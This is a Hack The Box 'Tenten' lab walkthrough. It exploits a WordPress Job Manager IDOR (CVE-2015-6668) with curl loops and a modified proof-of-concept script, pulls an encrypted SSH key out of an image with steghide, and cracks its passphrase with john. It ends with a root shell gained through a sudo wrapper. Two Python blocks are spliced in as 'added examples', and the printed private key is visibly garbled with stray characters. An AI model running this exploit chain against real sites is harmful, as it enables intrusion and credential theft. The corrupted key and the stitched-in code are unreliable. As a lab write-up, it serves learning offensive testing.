HTB – Tenten Walkthrough

nmap

Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 (RSA)
|   256 (ECDSA)
|_  256 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.7.3
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Job Portal – Just another WordPress site
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

WPScan – enumerate users

wpscan --url http://10.10.10.10 --log --enumerate u

NOTE: Gem.gunzip is deprecated; use Gem::Util.gunzip instead. It will be removed on or after 2018-12-01.
Gem.gunzip called from /usr/lib/ruby/vendor_ruby/unicode/display_width/index.rb:5.
The supplied log file /root/.wpscan/log.txt already exists. If you continue the new output will be appended.
Do you want to continue? [Y]es [N]o, default: [N]

WordPress Security Scanner by the WPScan Team
Version 2.9.4
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_

It seems like you have not updated the database for some time.
Last database update: 2019-03-18
Do you want to update now? [Y]es [N]o [A]bort update, default: [N]
Updating the Database ...
Update completed.

[+] URL: http://10.10.10.10/
[+] Started: Sat Jul 6 2019

[+] Interesting header: LINK: <http://10.10.10.10/index.php/wp-json/>; rel="https://api.w.org/"
[+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu)
[+] XML-RPC Interface available under: http://10.10.10.10/xmlrpc.php   [HTTP 405]
[+] Found an RSS Feed: http://10.10.10.10/index.php/feed/   [HTTP 200]
[i] Detected 1 user from RSS feed:
+-------+
| Name  |
+-------+
| takis |
+-------+

WPScan – Plugin Vulnerability (IDOR) found

[+] Enumerating plugins from passive detection ...
 | 1 plugin found:

[+] Name: job-manager - v0.7.25
 |  Latest version: 0.7.25 (up to date)
 |  Last updated:
 |  Location: http://10.10.10.10/wp-content/plugins/job-manager/
 |  Readme: http://10.10.10.10/wp-content/plugins/job-manager/readme.txt

[!] Title: Job Manager <= 0.7.25 - Insecure Direct Object Reference
    Reference: https://wpvulndb.com/vulnerabilities/8167
    Reference: https://vagmour.eu/cve-2015-6668-cv-filename-disclosure-on-job-manager-wordpress-plugin/
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6668

[+] Enumerating usernames ...
[+] We identified the following 1 user:
+----+-------+-------+
| ID | Login | Name  |
+----+-------+-------+
| 1  | takis | takis |
+----+-------+-------+

https://vagmour.eu/cve-2015-6668-cv-filename-disclosure-on-job-manager-wordpress-plugin/

Following the PoC described at the URL above, I first tried uploading a CV file through the job application form:

[Burp Repeater screenshot: a multipart/form-data POST to the "Job Application" form that uploads htb.png (Content-Type: image/png); the server answers HTTP/1.1 200 OK from Apache/2.4.18 (Ubuntu) with the application page, whose <title> includes the submitted application name.]

Since WordPress stores uploaded files under /wp-content/uploads/{year}/{month}/{filename}, I checked whether the file I uploaded exists at that path, and it does:

http://10.10.10.10/wp-content/uploads/2019/07/htb.png

The application name I submitted also shows up in the HTML of the application page, in the <title> tag. The page is addressed by a sequential numeric ID, so I brute-forced the IDs (the IDOR) and an interesting application name turned up:

curl -s http://10.10.10.10/index.php/jobs/apply/8/ | grep '<title>'
<title>Job Application: Pen Tester – Job Portal</title>

for i in $(seq 1 20); do echo -n "$i: "; curl -s http://10.10.10.10/index.php/jobs/apply/$i/ | grep '<title>'; done
1: <title>Job Application: Hello world! – Job Portal</title>
2: <title>Job Application: Sample Page – Job Portal</title>
3: <title>Job Application: Auto Draft – Job Portal</title>
4: <title>Job Application: – Job Portal</title>
5: <title>Job Application: Jobs Listing – Job Portal</title>
6: <title>Job Application: Job Application – Job Portal</title>
7: <title>Job Application: Register – Job Portal</title>
8: <title>Job Application: Pen Tester – Job Portal</title>
9: <title>Job Application: – Job Portal</title>
10: <title>Job Application: Application – Job Portal</title>
11: <title>Job Application: cube – Job Portal</title>
12: <title>Job Application: Application – Job Portal</title>
13: <title>Job Application: HackerAccessGranted – Job Portal</title>
14: <title>Job Application: Application – Job Portal</title>
15: <title>Job Application: htb – Job Portal</title>
16: <title>Job Application: Application – Job Portal</title>
17: <title>Job Application: htb – Job Portal</title>
18: <title>Job Application: – Job Portal</title>
19: <title>Job Application: – Job Portal</title>
20: <title>Job Application: – Job Portal</title>
root@kali:/home/kalisa/HTB/tenten#
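The same enumeration in Python, as an added example that is not part of the original post: it walks the application IDs, pulls the application name out of each page's <title> (also handling the &#8211; entity form of the dash that WordPress sometimes emits instead of the literal character), and treats unreachable or nameless IDs as misses. The fetcher is injectable, so the constructed sample pages below let it run offline; pass the real fetcher (the default) for a live target. The sample pages, function names and constants are my own assumptions, not the plugin's code.

```python
import html
import re
import urllib.request
from typing import Callable, Dict, Iterable, Optional

TITLE_RE = re.compile(r"<title>(.*?)</title>", re.IGNORECASE | re.DOTALL)
# Title pattern the plugin produced on the box: "Job Application: <name> – Job Portal"
APP_RE = re.compile(r"Job Application:\s*(.*?)\s*–\s*Job Portal")


def extract_application_name(body: str) -> Optional[str]:
    """Return the application name from the page <title>, or None if it is
    missing or empty.  The title is HTML-unescaped first so that an en dash
    written as &#8211; matches the same pattern as a literal one."""
    m = TITLE_RE.search(body)
    if not m:
        return None
    title = html.unescape(m.group(1))
    m2 = APP_RE.search(title)
    if not m2:
        return None
    name = m2.group(1).strip()
    return name or None


def http_get(url: str, timeout: float = 5.0) -> Optional[str]:
    """Live fetcher: page body as text, or None on any HTTP/network error."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.read().decode("utf-8", errors="replace")
    except Exception:
        return None


def enumerate_applications(base_url: str, ids: Iterable[int],
                           fetch: Callable[[str], Optional[str]] = http_get) -> Dict[int, str]:
    """Request /index.php/jobs/apply/<id>/ for every id and collect the names found.
    IDs that fail to load or carry an empty name are simply left out."""
    found: Dict[int, str] = {}
    for job_id in ids:
        body = fetch(f"{base_url.rstrip('/')}/index.php/jobs/apply/{job_id}/")
        if body is None:
            continue
        name = extract_application_name(body)
        if name:
            found[job_id] = name
    return found


# Constructed responses for offline use (not captured from the box).  ID 2 has
# an empty name and ID 3 uses the entity form of the dash on purpose.
SAMPLE_PAGES = {
    "http://10.10.10.10/index.php/jobs/apply/1/":
        "<html><head><title>Job Application: Hello world! – Job Portal</title></head></html>",
    "http://10.10.10.10/index.php/jobs/apply/2/":
        "<html><head><title>Job Application:  – Job Portal</title></head></html>",
    "http://10.10.10.10/index.php/jobs/apply/3/":
        "<html><head><title>Job Application: HackerAccessGranted &#8211; Job Portal</title></head></html>",
}


def fake_fetch(url: str) -> Optional[str]:
    """Offline stand-in for http_get; unknown URLs behave like a failed request."""
    return SAMPLE_PAGES.get(url)


if __name__ == "__main__":
    # Drop the fake_fetch argument to run this against a real target.
    hits = enumerate_applications("http://10.10.10.10", range(1, 21), fake_fetch)
    for job_id, name in sorted(hits.items()):
        print(f"{job_id}: {name}")
```

Keying on the title rather than the HTTP status matters here because every ID, including empty ones, returns 200; the same logic is what the Burp Intruder run below relies on when sorting by response length.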

One can also do the brute force via Burp Intruder

[Burp Intruder screenshot: the numeric ID in /index.php/jobs/apply/§ID§/ is the single payload position, with numeric payloads 1 to 16. Every request returns HTTP 200 with response lengths between 57748 and 57906, so the status code is useless as a signal; repeated lengths such as 57748 and the <title> are what separate hits from misses. The selected response shows <title>Job Application: HackerAccessGranted – Job Portal</title>.]

I used the PoC exploit from the blog post above and modified it a bit, adding image extensions since the form accepted htb.png, as below:

import requests

print("""
CVE-2015-6668
Title: CV filename disclosure on Job-manager WP Plugin
Author: Evangelos Mourikis
Blog: https://vagmour.eu
Plugin URL: http://www.wp-jobmanager.com
Versions: <=0.7.25
""")

website = input('Enter a vulnerable website: ').rstrip('/')
filename = input('Enter a file name: ')

# WordPress sanitises upload names: spaces become dashes
filename2 = filename.replace(' ', '-')

# Uploads live under /wp-content/uploads/{year}/{month}/; this is the year
# range the upstream PoC used, widen it for newer targets
for year in range(2013, 2018):
    for month in range(1, 13):
        # the upstream PoC only tried CV-like extensions (doc, pdf, docx);
        # image types are added here because the form accepted htb.png above
        for extension in ('doc', 'pdf', 'docx', 'jpg', 'jpeg', 'gif', 'png'):
            URL = (website + '/wp-content/uploads/' + str(year) + '/'
                   + '{:02}'.format(month) + '/' + filename2 + '.' + extension)
            req = requests.get(URL)
            if req.status_code == 200:
                print('[+] URL of CV found! ' + URL)

And it found a file with the name HackerAccessGranted:

python cve-2015-6668.py

CVE-2015-6668
Title: CV filename disclosure on Job-manager WP Plugin
Author: Evangelos Mourikis
Blog: https://vagmour.eu
Plugin URL: http://www.wp-jobmanager.com
Versions: <=0.7.25
Enter a vulnerable website: http://10.10.10.10
Enter a file name: HackerAccessGranted
[+] URL of CV found! http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg

I downloaded the jpg file and checked it for hidden data with the following tools:

strings HackerAccessGranted.jpg | less

exiftool HackerAccessGranted.jpg

binwalk HackerAccessGranted.jpg

steghide extract -sf HackerAccessGranted.jpg    (-sf selects the stego file)

From steghide's help:

extracting options:
 -sf, --stegofile        select stego file
   -sf <filename>          extract data from <filename>
 -p, --passphrase        specify passphrase
   -p <passphrase>         use <passphrase> to extract data
 -xf, --extractfile      select file name for extracted data
   -xf <filename>          write the extracted data to <filename>
 -f, --force             overwrite existing files
 -q, --quiet             suppress information messages
 -v, --verbose           display detailed information
options for the info command:
 -p, --passphrase        specify passphrase
   -p <passphrase>         use <passphrase> to get info about embedded data
To embed emb.txt in cvr.jpg: steghide embed -cf cvr.jpg -ef emb.txt
To extract embedded data from stg.jpg: steghide extract -sf stg.jpg

Only steghide turned something up; the embedded data was protected with an empty passphrase, so pressing Enter at the prompt is enough:

steghide --extract -sf HackerAccessGranted.jpg
Enter passphrase:
wrote extracted data to "id_rsa".

Look at the content of the id_rsa file:

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,7265FC656C429769E4C1EEFC618E660C

/HXcU80T3Jhzb1H7uF9Vh7faa76XH1dr/ChOpDnJunjdmLS/1aq1ku1Q3/RF/Vax 
tj Tzj /V5h8EcL5GcHv3es romsoj rkpawfbvwbR+XxFIJuz7zLfd/vDo 
1KuGrCrRRsipkyae5Kiq1C137bmWK9aE/4c5X2yfVTOEeODdWOrAoTzGufWtThZf 
K2nyOiTGPndD7LMdm/0505As+ChDYFNphVIXDgfDzHgonKMC4iES7Jk8Gz20PJsm 
SdWCazF6p1Eqh14NQrnkd8kmKqzkpfWqZDz3æg6f49GYf97aM5TQgTday20FqoXH 
WPhK3CmOtMGqLZA01æoNuwXSOH53t9FG7GqU31wj7nAGW8pfGodGwedYde4z108P 
VbNu1RMKOkErv/NCiGVRcK6k5Qtdbwforh+6bmjmKE6QvMXbesZtQOgC9SJZ31MT 
JOIY838HQZgOsSw1jDrxuPV2DUIYFROW3kQrDVUym080xOwOf/MITxvrC2wvbHqw 
AAniuEotb90az/Pfau300/DVzYkq199VDX/Y81xd168qqZbXsM9s/aMCdVg7TJ1g 
2gxE1pV7U9kxi1/RNdx5UASFpvFs1mOn7CTZ6N44xiatQUHyVINgpNCyjfEmzxmo 
6FtWaVqbGStax1iMRC198ZOcRkX2VoTvT1hQw74rSPGPMEH+OSFksXp7Se/wCDMA 
pYZASVx160NWQGpAj5z4Wha8S8Er8ZVmFfykuh4107Tsnxa9WNoWX06XOFSOPMk 
tNp8bPPq15+M+dSZaObad9E/mnv8faSKlvkn4epk87nOVk01ssLcecfxi+bWnGPm 
KowyqU6iuF28w1J98towgnWrUgt1qubmkOwkf+108ig7komyT9KfZegR70F92xE9 
41WDTxfLy7501DHORrmOf77D4HvNC2qQOdYHkApd1dk4b1cb71Fi5WF183RruygF 
2GSre8yXn5g915Ya82uC30+ST5Q8eY2pT88k2D61kmt6u11LnoOSkr3v9r6JT5J7 
LOUtmgdUqf+35æcA70L/w11POE04UOaaGpscDg059DL88dzv1hyHg4T1fd9xWtQS 
VxmzURTwEZ43j SxX94PL lwcxzLV6FfRVAKdbi6kACsgVeULi1+YAfPj 11yVOm1kv 
5HV/bYJvVatGtmkNumtuK7NOH8iE7kCDxCnPnPZaOnWoHDk4yd50R1zznkPna74r 
Xb09FdNeLNmER/7GGdQARkpd52Uur08f1JW2wyS1bdgb8gw/G+puFAR8z7ipgj4W 
p9LoYqiuxaEbiD5zUzeOtKAKL/nfmzK82zbdPxmrv7TvHUSSWEUC409QKi83amgf 
ywmjw30tH+ZLn8my/fS61VQ50nV6rVhQ7+LRKeæq1Yidzfp1911L8Uidbs8fWAz8 
9XkOsH5c1NQT6spo/nQM3UN1kknæa7zKPJmetHs040b3xKLiSpw5f35SRV4rF+mO 
v1UE1/YssXM07TK6i81XCuuOUtOpGiLxNVR1aJvbGmazLWCSyptk5fJhPLkhuK+J 
YoZn9FNAuRiYFL3rw+6q01+KoqzoPJJek6WHRy80SE+8Dz1ysTLIP86tGKn7EWnP 
-----END RSA PRIVATE KEY-----

The Proc-Type: 4,ENCRYPTED header means the key is passphrase-protected, so we need to recover the passphrase before we can use it.

Turn the key into a form john can crack with the sshng2john tool:

python sshng2john.py id_rsa > id_john
cat id_john
id_rsa:$sshng$1$16$7265FC656C429769E4C1EEFC618E660C$1200$fc75dc501393dc98736e51fbb85f5587b7da6bbe971c876bfc2874a439c9ba78dd98b4bf95aab592e950dff445fd56b1b634f38ff57984118e0dd5b4ac0a13cc6b9f5ad4e165f2b69f2d224c63e7743ecb39262aace4a5f5aa643cf7fa0e9fe3d1987fdeda3394d081375acb6a05aa85c758f84adc29b4b4c1aa2d9034d7ea0dbb05d2d07e77b7d146ec6a94df5c23ee7006581a5f1a8746c1e75875ee3394e0416de442b0d55329b4068c4ec0e7ff3254f1beb0b6c2f6c7ab00009e2b84a2d6fda1acff3df6aedce3bf0d5cd892a23df550d7fd8048c5dd7af2aa996d7b0cf6cfda30275583b4c9d60da0c4496957b53d9318a5fd135dc79500485a6f16c9663a7ec24d9e8de38c626ad4141f2575360a4d0b28df10ccd7328e85b56695a9b192b5ac7588c442d7df19d1c4645f65684ef4e5850c3be2b48f18f3041fe392164b17a7b49eff0083300a58640495c65ea835640afa9023e73e1685a052044afc6559857f292e878968ed3b27c5af56368597a3a5f415238f324b4da416cf3ead79f8cf9d49968e6da77d13f327bc17da48a96f927e1ea6407b9f45643b5b2c2dc79c7f1ee817ddb113de085834f17cbcbbe68d431292bdeff6be894f927b2f452d320754a9ffb7e7e700ef42ffc0894fd04d3853469a1a9b1c0e0d39f432fcf1dcef221c878384e57ddf715ad4125713335114f0119e378d2c57f783cb970731ccb57a15f45500a75b8ba9000ac8157942e223ec807cf8c82325749b592fe4757f6d826f55ab46b6690db8cb6e2bb34e1fc884ee4083c429cf9cf65ad275a81c3938c9de74465cf39e43e76bbe2b5dba3d15d35e2cd98447fec619d400464a5de7652eaf4f11b883e7353378eb4a00a2ff9df9b32bcdb36dd3f132bbfb4ef1d4492584501355448689bdb1a66b32d6092ca9b64e5f2613cb921b8af89628667f45340b9189814bdebc3eeaaa25f8aa2ace83c925e93a587472f0e484fbc0f3d72b132c83c1ead18a9fb1169cf
root@kali:/home/kalisa/HTB/tenten#

Then crack the passphrase:

john id_john --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/32])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
superpassword    (id_rsa)
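To see what sshng2john actually produces and what john then has to compute for every candidate, here is an added example, not the page's script and not sshng2john's or john's own code: it parses a legacy PEM key carrying a DEK-Info header into john's $sshng$ line, and runs the OpenSSL PEM key derivation for this key type (EVP_BytesToKey with MD5, one iteration, salted with the first 8 bytes of the IV). That single-MD5 KDF is why john reports an iteration count of 1 and why such keys fall to a wordlist so quickly. The key body is constructed placeholder bytes and only the IV is taken from the key above; the decrypt-and-check of the ASN.1 payload, which is how john tells a right passphrase from a wrong one, needs an AES implementation and is left out.

```python
import base64
import hashlib
from typing import Tuple

# Cipher ids john's ssh format uses in the $sshng$ line (assumed from the
# format john loaded above: 1 for AES-128-CBC)
CIPHER_IDS = {"DES-EDE3-CBC": 0, "AES-128-CBC": 1}


def parse_encrypted_pem(pem: str) -> Tuple[str, str, bytes]:
    """Split a legacy PEM key into (cipher name, IV hex as written, raw ciphertext).
    Raises ValueError for keys that are not passphrase-protected."""
    lines = [ln.strip() for ln in pem.strip().splitlines()]
    if not (lines[0].startswith("-----BEGIN ") and lines[-1].startswith("-----END ")):
        raise ValueError("not a PEM block")
    headers = {}
    body = []
    for ln in lines[1:-1]:
        if not body and ":" in ln:          # "Proc-Type: ..." / "DEK-Info: ..." lines
            key, val = ln.split(":", 1)
            headers[key.strip()] = val.strip()
        elif ln:                            # base64 payload; blank separator line skipped
            body.append(ln)
    if headers.get("Proc-Type") != "4,ENCRYPTED":
        raise ValueError("key is not passphrase-protected; nothing to crack")
    cipher, iv_hex = (s.strip() for s in headers["DEK-Info"].split(",", 1))
    if cipher not in CIPHER_IDS:
        raise ValueError(f"unsupported cipher {cipher}")
    return cipher, iv_hex, base64.b64decode("".join(body))


def to_john(pem: str, label: str = "id_rsa") -> str:
    """Emit the label:$sshng$<cipher>$<ivlen>$<iv>$<datalen>$<data> line john loads."""
    cipher, iv_hex, data = parse_encrypted_pem(pem)
    return (f"{label}:$sshng${CIPHER_IDS[cipher]}${len(iv_hex) // 2}${iv_hex}"
            f"${len(data)}${data.hex()}")


def legacy_pem_key(passphrase: bytes, iv_hex: str, key_len: int = 16) -> bytes:
    """Derive the cipher key the way OpenSSL's PEM code does: EVP_BytesToKey with
    MD5, count 1, salt = first 8 bytes of the IV.  AES-128 needs one MD5 output;
    3DES (24-byte key) chains a second round, D2 = MD5(D1 || pass || salt)."""
    salt = bytes.fromhex(iv_hex)[:8]
    out, prev = b"", b""
    while len(out) < key_len:
        prev = hashlib.md5(prev + passphrase + salt).digest()
        out += prev
    return out[:key_len]


# Constructed key: the IV is the one from the DEK-Info line above, the body is
# 48 placeholder bytes and not real key material.
SAMPLE_IV = "7265FC656C429769E4C1EEFC618E660C"
SAMPLE_PEM = "\n".join([
    "-----BEGIN RSA PRIVATE KEY-----",
    "Proc-Type: 4,ENCRYPTED",
    f"DEK-Info: AES-128-CBC,{SAMPLE_IV}",
    "",
    base64.b64encode(bytes(range(48))).decode(),
    "-----END RSA PRIVATE KEY-----",
])

if __name__ == "__main__":
    print(to_john(SAMPLE_PEM))
    print("AES key for 'superpassword':", legacy_pem_key(b"superpassword", SAMPLE_IV).hex())
```

Because the per-candidate work is one MD5 plus an AES block or two, and the correctness check is only a sanity test on the decrypted DER structure, john's "may emit false positives" warning is real for this format; confirm a candidate with ssh-keygen -y -f id_rsa, which prints the public key only when the passphrase is right.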

Change the permissions of the key file to 600 and log in as takis with the cracked passphrase (if john had produced more than one candidate, ssh-keygen -y -f id_rsa is a quick way to check which one really unlocks the key):

chmod 600 id_rsa
ssh -i id_rsa takis@10.10.10.10
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

65 packages can be updated.
39 updates are security updates.

Last login: Fri May 5 2017
takis@tenten:~$

Priv Esc

takis@tenten:~$ sudo -l
Matching Defaults entries for takis on tenten:
    env_reset, mail_badpass, secure_path=...

User takis may run the following commands on tenten:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: /bin/fuckin

So takis can run /bin/fuckin as root without a password.

The file is a two-line bash script that simply executes whatever arguments it is given:

takis@tenten:~$ cat /bin/fuckin
#!/bin/bash
$1 $2 $3 $4

Because the arguments are expanded unquoted and run with root's privileges, passing bash as the first argument gives a root shell:

takis@tenten:~$ sudo /bin/fuckin bash
whoami
root
root@tenten:~#
